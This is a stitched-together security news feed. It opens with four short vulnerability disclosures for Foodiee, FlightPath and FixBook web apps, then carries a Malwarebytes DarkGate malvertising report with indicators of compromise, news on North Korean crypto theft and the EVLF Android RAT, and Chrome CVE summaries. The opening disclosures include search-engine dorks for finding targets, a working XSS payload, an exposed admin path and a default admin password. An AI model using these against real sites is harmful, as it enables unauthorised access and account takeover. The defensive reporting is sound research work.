Foodiee CMS version 1.0.1 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Foodiee CMS v1.0.1 Insecure Direct Object Reference Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit)                                             || # Vendor    : https://foodie.com.np/                                                                                             || # Dork      : "restaurants_details.php?id="                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference Allows full control of the website.[+] Use payload : /admin/dashboard.php[+] http://127.0.0.1/wwwmaulikbazarcom/admin/dashboard.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Foodiee CMS 1.0.1 Insecure Direct Object Reference

Foodiee Online Food Ordering Web Application version 1.0.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Foodiee - Online Food Ordering Web Application V1.0.0 Insecure Settings Vulnerability                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/foodiee-restaurant-web-application/23335754?s_rank=57                                  |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Use Backdoor Account : Username – admin@foodiee.com                           Password – 123456                   [+] Panel : http://127.0.0.1/themeforestkamleshyadavnet/script/foodiee/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Foodiee Online Food Ordering Web Application 1.0.0 Insecure Settings

FlightPath LMS version 4.8.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v4.8.2 XSS Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!>[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 4.8.2 Cross Site Scripting

FixBook Repair Shop Management Tool version 3.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : FixBook - Repair Shop Management Tool v3.0 Password Hash Disclosure Vulnerability                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567                                           || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Open the source code of the page[+] Go 2 line 49  found pass of databass encrypted . view-source:http://target_site/repair/update/[+] Here Update admin information : http://127.0.0.1/repair/update/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FixBook Repair Shop Management Tool 3.0 Hash Disclosure

Categories: Threat Intelligence
Tags: darkgate

Tags: autoit

Tags: malvertising

Tags: seo poisoning

The new version of the DarkGate malware is currently actively being distributed via malspam, malicious ads and SEO poisoning.



(Read more...)




The post DarkGate reloaded via malvertising and SEO poisoning campaigns appeared first on Malwarebytes Labs.

In July 2023, we observed a malvertising campaign that lured potential victims to a fraudulent site for a Windows IT management tool. Unlike previous similar attacks, the final payload was packaged differently and not immediately recognizable.

The decoy file came as an MSI installer containing an AutoIT script where the payload was obfuscated to avoid detection. Upon analysis and comparison, we determined that this sample was an updated version of DarkGate, a multi purpose malware toolkit first identified in 2018. 

Since the malware's obfuscation and encryption features have been recently documented by other researchers, we will focus on two of its web delivery methods, namely the use of malicious ads and search engine poisoning.

The campaigns we observed coincide with an announcement from DarkGate's developer in June as well, boasting about the malware's new capabilities and limited customer seats.

**New DarkGate**

In its debut back in 2018 and later in 2020, DarkGate (also known as MehCrypter) was distributed via torrent sites and mostly focused on European victims and Spanish users in particular. The original blog post from enSilo (now Fortinet) also notes that its author may have been using email to spread malicious attachments.

In June 2023, a threat actor going by the handle RastaFarEye posted an advertisement in the XSS underground forum about a project known as DarkGate. As detailed by the ZeroFox Dark Ops intelligence team, the new version includes certain key features to evade detection while offering the expected credential stealing capabilities. The cost ($100K/year) and limited availability (10 customers) make DarkGate somewhat of an elusive toolkit.

Photo credit: ZeroFox Dark Ops intelligence team

Two blog posts came out in early August, identifying new DarkGate attacks:

*   Aon's Stroz Friedberg Incident Response Services details how they encountered a recent incident from a group similar to ScatteredSpider (UNC3944) that was using this new version of DarkGate.
*   Researcher 0xToxin wrote about phishing emails distributing a loader leading to DarkGate, with a complete technical analysis of the malware.

**Malvertising**

While investigating malvertising campaigns, we observed the following Google ad on on July 13, 2023:

Advanced IP Scanner is a popular tool used by IT administrators. Victims who click on the ad are presented with a decoy site:

The downloaded file (_Advanced\_IP\_Scanner\_2.5.4594.1.msi_) is an installer that contains the legitimate Advanced IP Scanner binary but also some extra files that are unpacked in the %temp% folder upon execution:

We recognize the familiar use of AutoIT which was already present in the very early versions of DarkGate.

Note: The same threat actor was also serving malicious ads via Bing as documented by Cyberuptive on August 8, 2023.

**SEO poisoning**

SEO poisoning is an old technique used by various threat actors and scammers who attempt to game search engines' ranking system. Although it takes a little more time to roll out, it is an effective way to trick users into visiting malicious sites.

The following search result appeared on Google:

The domain advancedscanner\[.\]link was created on 2023-07-28 and is used to redirect to the decoy page hosted at ipadvancedscanner\[.\]com. The downloaded file, IPAVSCAN\_win\_vers\_1.1.3.msi, also has the same AutoIt encrypted payload:

**Anti-VM and other checks**

We noticed that several of the newly registered domains associated with these campaigns had implemented advanced fingerprinting checks. We recently documented this trend which could soon become the norm due to its ease of use.

Here's another lure, this time for Angry IP Scanner, with a domain (ipangry\[.\]com registered 2023-07-29):

The payload, angry\_win\_0.47\_installer.msi and its AutoIt script:

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. They are also diversifying their delivery techniques by leveraging malspam, malvertising and SEO poisoning.

Malwarebytes' anti-malware engine detects this malware as Backdoor.DarkGate and our web protection blocks its known command and control servers.

Malwarebytes for Business (EDR) customers may also see the following alerts:

**Indicators of Compromise**

**Malvertising campaign**

top\[.\]advscan\[.\]com  
advanced-ips-scanne\[.\]com  
a4scan\[.\]com  
advanced-ip-scanne\[.\]com

**SEO poisoning campaign**

advancedscanner\[.\]link  
ipadvancedscanner\[.\]com  
185.224.137\[.\]54  
185.11.61\[.\]65

**DarkGate samples**

e5ca3a8732a4645de632d0a6edfaf064bdd34a4824102fbc2b328a974350db8f  
206042ec2b6bc377296c8b7901ce1a00c393df89e7c4cbbb1b8da1a86a153b67  
9a7db0204847d26515ed249f9ed577220326f63a724a2e0fb6bb1d8cd33508a3

**DarkGate C2s**

80.66.88\[.\]145  
107.181.161\[.\]200

**Additional resources**

*   0xToxin's payload decryptor
*   RussianPanda's DarkGate config extractor

DarkGate reloaded via malvertising and SEO poisoning campaigns

The U.S. Federal Bureau of Investigation (FBI) on Tuesday warned that threat actors affiliated with North Korea may attempt to cash out stolen cryptocurrency worth more than $40 million.
The law enforcement agency attributed the blockchain activity to an adversary the U.S. government tracks as TraderTraitor, which is also known by the name Jade Sleet.
An investigation undertaken by the FBI found

Cryptocurrency / Cyber Attack

The U.S. Federal Bureau of Investigation (FBI) on Tuesday warned that threat actors affiliated with North Korea may attempt to cash out stolen cryptocurrency worth more than $40 million.

The law enforcement agency attributed the blockchain activity to an adversary the U.S. government tracks as TraderTraitor, which is also known by the name Jade Sleet.

An investigation undertaken by the FBI found that the group moved approximately 1,580 bitcoins from several cryptocurrency heists and is currently said to be holding those funds in six different wallets.

North Korea is known to blur the lines among cyber warfare, espionage, and financial crime. TraderTraitor, in particular, has been linked to a series of attacks targeting blockchain and cryptocurrency exchanges with the goal of plundering digital assets to generate illicit revenue for the sanctions-hit nation.

This includes the $60 million theft of virtual currency from Alphapo on June 22, 2023; the $37 million theft of virtual currency from CoinsPaid on June 22, 2023; and the $100 million theft of virtual currency from Atomic Wallet on June 2, 2023, as well as attacks targeting Sky Mavis' Ronin Network and Harmony Horizon Bridge last year.

The cluster shares overlap with another North Korean group dubbed APT38 (aka BlueNoroff or Stardust Chollima), which, in turn, is part of the larger Lazarus constellation. Google-owned Mandiant, last month, also connected TraderTraitor to UNC4899, a hacking crew attributed to the JumpCloud hack in late June 2023.

According to data compiled by blockchain intelligence firm TRM Labs, North Korean hackers are estimated to have stolen over $2 billion in cryptocurrencies since 2018 as part of a series of 30 attacks, with $200 million stolen in 2023 alone.

"Private sector entities should examine the blockchain data associated with these addresses and be vigilant in guarding against transactions directly with, or derived from, the addresses," the FBI said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Affiliates Suspected in $40M Cryptocurrency Heist, FBI Warns

Developers are not the only people who have adopted the agile methodology for their development processes. From 2023-06-15 to 2023-07-11, Permiso Security’s p0 Labs team identified and tracked an attacker developing and deploying eight (8) incremental iterations of their credential harvesting malware while continuing to develop infrastructure for an upcoming (spoiler: now launched) campaign

Agile Approach to Mass Cloud Credential Harvesting and Crypto Mining Sprints Ahead

A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT.
"These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week.
CypherRAT and CraxsRAT are said to be offered to other cybercriminals as

Mobile Security / Cyber Crime

A Syrian threat actor named **EVLF** has been outed as the creator of malware families CypherRAT and CraxsRAT.

"These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week.

CypherRAT and CraxsRAT are said to be offered to other cybercriminals as part of a malware-as-a-service (MaaS) scheme. As many as 100 unique threat actors are estimated to have purchased the twin tools on a lifetime license over the past three years.

EVLF is said to be operating a web shop to advertise their warez since at least September 2022.

CraxsRAT is billed as an Android trojan that enables a threat actor to remote control an infected device from a Windows computer, with the developer consistently releasing new updates based on feedback from the customers.

The malicious package is generated using a builder, which comes with options to customize and obfuscate the payload, choose an icon, the app name, and the features and permissions that need to be activated once installed on the smartphone.

"CraxsRAT is one of the most dangerous RATs in the current Android threat landscape, with impactful features such as Google Play protect bypass, live screen view, as well as a shell for command execution," Cyfirma explained.

"The 'Super Mod' feature renders the app more deadly still, making it hard for victims to uninstall the app (whenever the victim tries to uninstall, it crashes the page)."

The Android malware also requests victims to grant it permissions to Android's accessibility services, allowing it to harvest a wealth of information that would be valuable to cyber criminals, including call logs, contacts, external storage, location, and SMS messages.

EVLF has been observed operating a Telegram channel named "EvLF Devz" that was created on February 17, 2022. It has 10,678 subscribers as of writing.

A search for CraxsRAT surfaces numerous cracked versions of the malware hosted on GitHub, although it appears that Microsoft has taken down some of them over the past few days. The GitHub account of EVLF, however, remains active on the code-hosting service.

On August 23, 2023, EVLF posted a message on the channel saying they were hanging up the boots on the project, likely in response to the public disclosure of their activities.

"unfortunately this is the end , due to life circumstances i will stop developing and posting," EVLF said in the post. "for my customers don't worry , i will not let you and go , i will release couple of patch's for you before i go."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware

Use after free in Vulkan in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4430

Use after free in Loader in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Tag

#google